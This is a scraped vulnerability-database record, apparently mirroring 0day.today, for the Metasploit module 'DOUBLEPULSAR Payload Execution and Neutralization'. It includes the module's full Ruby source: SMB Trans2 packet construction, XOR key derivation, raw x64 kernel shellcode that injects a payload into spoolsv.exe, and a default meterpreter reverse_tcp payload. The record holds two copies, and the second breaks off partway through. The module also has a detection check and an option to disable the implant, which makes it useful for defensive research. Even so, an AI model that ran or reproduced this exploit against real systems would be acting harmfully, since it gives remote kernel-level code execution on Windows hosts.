["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-25T00:21:39", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-25T00:21:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-25] #"}, "lastseen": "2021-09-25T00:21:39", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "fd30c15cbe0b4e63089ef4c16f162294", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-26T00:16:00", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-26T00:16:00", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-26T00:16:00", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 